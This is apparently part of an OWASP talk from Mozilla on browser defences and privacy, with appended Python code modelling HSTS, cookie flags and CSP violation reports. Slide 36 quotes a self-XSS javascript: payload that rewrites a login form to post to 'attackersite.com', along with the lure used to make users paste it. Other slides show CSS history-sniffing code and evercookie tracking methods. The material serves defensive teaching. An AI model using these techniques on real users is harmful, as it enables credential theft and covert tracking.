  • 32. x-frame-options: Additional header for HTTP Response; instructs browser to disallow framing; two options - DENY, SAMEORIGIN. Example responses: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-Encoding Content-Length: 35236 x-frame-options: DENY; and the same response with x-frame-options: SAMEORIGIN OWASP 32
  • 33. x-frame-options: Targeted site not displayed if framed; error page displayed; prevents ClickJacking attack. Diagram: Attempted ClickJack (Attacker’s Overlay over Victim Site) versus x-f-o Result (error page instead of the framed site). OWASP 33
  • 34. Frame Busting Scripts: JavaScript within page to detect framing; will either “bust” the frame or not display content. <script> if (top.location != self.location) { top.location = self.location; } </script> Not optimal solution - techniques available to bypass defense OWASP 34
  • 35. URL Social Engineering: “Cool new hidden feature”, “Get 10 free gems for your game”: Click the square and type the secret combination ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter OWASP 35
  • 36. Danger of those keystrokes...: click square - selected text element; ctrl a - select all text; ctrl c - copy text; ctrl l - select location bar; ctrl v - paste text; enter - execute JavaScript. The selected text element holds a javascript: URL, shown on the slide as: javascript:var xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("GET", document.location, false);xmlHttp.send();xmlDoc=xmlHttp.responseText;var str=xmlDoc;x.replace(/somesite.com/, "attackersite.com"); document.writeln(x); OWASP 36
  • 37. URL JavaScript: Pasted JavaScript has full control of page; can rewrite page; extract and send any data; no indication to user. Diagram: Before - login form (username, password, submit) on somesite.com; After - the same form now posts to attackersite.com. OWASP 37
  • 38. Defense Code Change to Browser Remove association between javascript: & loaded document Renders attack inert OWASP 38
  • 39. Privacy. Headlines: Your Android Phone is Tracking You (April, 2011 - pcworld.com); Your iPhone Is Tracking Your Every Move (April, 2011 - readwriteweb.com); Mobile-App Makers Face U.S. Privacy Investigation (April, 2011 - online.wsj.com); Nissan car secretly shares driver data with websites (June, 2011 - theregister.co.uk/) OWASP 39
  • 40. Privacy Business gains from gathering user data Privacy infringement based on laws Privacy concerns based on user expectations Need better options for user to understand collected data, control flow and accessibility of user data OWASP 40
  • 41. Browser Profiling: Panopticlick fingerprints browser based on provided information: plugins installed, font support, screen resolution, time zone. Screenshot: “Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.” OWASP 41
  • 42. CSS History Sniffing: Determine user’s browsing habits with CSS; visited link styled differently than non-visited link (Visited Link / Unvisited Link); CSS and element inspection determines visited pages; issue fixed March 2010. Example: if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") { /* link.href has not been visited */ } else { /* link.href has been visited */ } http://dbaron.org/mozilla/visited-privacy OWASP 42
  • 43. Evercookie: “Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.” Multiple methods of storing data on client; could be abused for unauthorized tracking; goal to keep user in control of data storage / tracking mechanisms. Storage mechanisms: • Standard HTTP Cookies • Local Shared Objects (Flash Cookies) • Silverlight Isolated Storage • Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out • Storing cookies in Web History • Storing cookies in HTTP ETags • Storing cookies in Web cache • window.name caching • Internet Explorer userData storage • HTML5 Session Storage • HTML5 Local Storage • HTML5 Global Storage • HTML5 Database Storage via SQLite http://samy.pl/evercookie/ OWASP 43
  • 44. Do Not Track Adds header DNT: 1 to all web requests Tells websites user does not want browsing activity to be tracked http://dnt.mozilla.org/ OWASP 44
  • 45. Permission Manager: Granular management options for user interaction with sites. Control: Location Settings, Cookie Settings, Popup Windows, Offline Storage. Screenshot: about:permissions OWASP 45
  • 46. Privacy Design Privacy controls distinguish applications Design with privacy in mind Growing support for DNT OWASP 46
  • 47. Closing Defense In Depth Many new security controls to enhance security Strict Transport Security Content Security Policy x-frame-options Do Not Track OWASP 47
  • 48. Thanks! mcoates@mozilla.com @_mwc OWASP 48
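The session-management flows of slides 6, 9, 12, 13 and 26, traced in an added Python model that is not part of the talk: a toy browser that records HSTS policies and cookie flags from response headers and shows what it would send when the application redirects from the HTTPS login to an HTTP page. The `Browser` class, `login_then_redirect`, the hostnames and the cookie values are this example's own constructed data.

```python
import time
from urllib.parse import urlsplit, urlunsplit


class Browser:
    """Toy model of a browser's HSTS store and cookie jar (constructed example)."""
    def __init__(self, now=time.time):
        self.now = now
        self.hsts = {}     # host -> (expiry timestamp, includeSubDomains?)
        self.cookies = {}  # (host, name) -> (value, Secure flag, HttpOnly flag)

    def receive(self, url, headers):
        """Apply the headers (list of (name, value) pairs) of a response to url."""
        parts = urlsplit(url)
        for name, value in headers:
            key = name.lower()
            if key == "strict-transport-security" and parts.scheme == "https":
                # Only honoured over HTTPS; otherwise a network attacker could set or clear it.
                directives = [d.strip().lower() for d in value.split(";")]
                max_age = next((int(d[8:]) for d in directives if d.startswith("max-age=")), 0)
                if max_age <= 0:
                    self.hsts.pop(parts.hostname, None)   # max-age=0 clears the policy
                else:
                    self.hsts[parts.hostname] = (self.now() + max_age,
                                                 "includesubdomains" in directives)
            elif key == "set-cookie":
                pairs = [p.strip() for p in value.split(";")]
                cname, cvalue = pairs[0].split("=", 1)
                attrs = {p.lower() for p in pairs[1:]}
                self.cookies[(parts.hostname, cname)] = (cvalue, "secure" in attrs,
                                                         "httponly" in attrs)

    def hsts_applies(self, host):
        """True if an unexpired HSTS policy covers host directly or as a subdomain."""
        for known, (expiry, subdomains) in self.hsts.items():
            if expiry > self.now() and (host == known or
                                        (subdomains and host.endswith("." + known))):
                return True
        return False

    def prepare_request(self, url):
        """Return (URL actually sent, Cookie header value) for a navigation to url."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.hsts_applies(parts.hostname):
            parts = parts._replace(scheme="https")   # slide 9: upgraded before it is sent
        # Slide 13: a Secure cookie is left out of an HTTP request; the request still goes.
        cookie = "; ".join(f"{n}={v}" for (h, n), (v, secure, _) in self.cookies.items()
                           if h == parts.hostname and (parts.scheme == "https" or not secure))
        return urlunsplit(parts), cookie

    def script_cookies(self, host):
        """What document.cookie exposes to page script (slide 26): HttpOnly cookies hidden."""
        return "; ".join(f"{n}={v}" for (h, n), (v, _, httponly) in self.cookies.items()
                         if h == host and not httponly)


def login_then_redirect(set_cookie, hsts=None):
    """Slide 6: HTTPS login sets the session cookie, then the app redirects to an HTTP page."""
    browser = Browser()
    headers = [("Set-Cookie", set_cookie)]
    if hsts:
        headers.append(("Strict-Transport-Security", hsts))
    browser.receive("https://site.com/login", headers)
    return browser.prepare_request("http://site.com/profile")   # what hits the wire
```

Without either control the session ID travels in the clear; the Secure flag alone keeps the cookie out of the HTTP request but still lets the request go, and only HSTS turns it into an HTTPS request that can carry the cookie safely.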

Editor's Notes

  23. CSP violation report fields:
  • request: The HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.
  • request-headers: The HTTP headers that were sent resulting in a violation of the Content Security Policy.
  • blocked-uri: The URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the case of frame-ancestors violations; in that case, you should assume the blocked URI is the same as the request URI.
  • violated-directive: The name of the policy section that was violated.
  • original-policy: The original policy as specified by the X-Content-Security-Policy HTTP header.
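An added receiver for the violation reports of slides 22 and 23 (example code, not from the talk): it validates the client-supplied JSON, keeps only the five report fields named on slide 23, and triages each report as probable XSS, an unexpected external script, or policy noise. The `csp-report` envelope, the size caps, treating every field as a string, and the rule that a blocked inline script is reported with a blocked-uri of `self` are assumptions; the sample reports and `SITE_HOSTS` are constructed.

```python
import json
from urllib.parse import urlsplit

# Field names from slide 23 / the editor's note; caps and the "csp-report" envelope are assumptions.
REPORT_FIELDS = ("request", "request-headers", "blocked-uri",
                 "violated-directive", "original-policy")
MAX_BODY, MAX_FIELD = 64 * 1024, 4096
SITE_HOSTS = {"site.com", "www.site.com"}   # constructed: hosts that serve our own script


def parse_report(body):
    """Validate one client-supplied report body; return its fields or raise ValueError."""
    if len(body) > MAX_BODY:
        raise ValueError("report body too large")
    data = json.loads(body)                       # JSONDecodeError is a ValueError
    report = data.get("csp-report") if isinstance(data, dict) else None
    if not isinstance(report, dict):
        raise ValueError("missing csp-report object")
    cleaned = {}
    for field in REPORT_FIELDS:                   # anything else the client sent is dropped
        value = report.get(field, "")
        if not isinstance(value, str) or len(value) > MAX_FIELD:
            raise ValueError(f"bad {field}")
        cleaned[field] = value.strip()
    if not cleaned["violated-directive"]:
        raise ValueError("no violated-directive")
    return cleaned


def classify(report):
    """Triage a validated report: 'probable-xss', 'external-script' or 'policy-noise'."""
    directive = report["violated-directive"].split()[0].lower()
    if directive not in ("script-src", "allow", "default-src"):
        return "policy-noise"                     # img/frame/xhr violations are not script
    blocked = report["blocked-uri"]
    if blocked in ("", "self", "inline"):         # assumption: inline script reported this way
        return "probable-xss"                     # script in our own page that we never wrote
    host = urlsplit(blocked).hostname
    return "external-script" if host and host not in SITE_HOSTS else "policy-noise"


def triage(bodies):
    """Count categories over a batch; malformed reports are counted, never trusted."""
    counts = {"probable-xss": 0, "external-script": 0, "policy-noise": 0, "invalid": 0}
    for body in bodies:
        try:
            counts[classify(parse_report(body))] += 1
        except ValueError:
            counts["invalid"] += 1
    return counts


def _report(blocked, directive, request="GET /profile HTTP/1.1"):   # constructed sample body
    return json.dumps({"csp-report": {
        "request": request, "request-headers": "Host: site.com\nUser-Agent: Mozilla/5.0",
        "blocked-uri": blocked, "violated-directive": directive,
        "original-policy": "allow 'self'; img-src 'self' data:; report-uri /CSPalert"}})


SAMPLE_REPORTS = [   # constructed: injected <script> (slide 20), a third-party widget,
    _report("self", "script-src 'self'", "GET /?a=%3cscript%3edocument%2e HTTP/1.1"),
    _report("http://cdn.example.net/widget.js", "script-src 'self'"),  # an inline image,
    _report("data:image/png;base64,AAAA", "img-src 'self'"),           # and a malformed body
    '{"csp-report": "not an object"}',
]
```

Because the report comes from the client, the collector treats it as evidence to investigate, not as proof: a flood of `probable-xss` reports for one request path is the signal to go and read that page's output encoding.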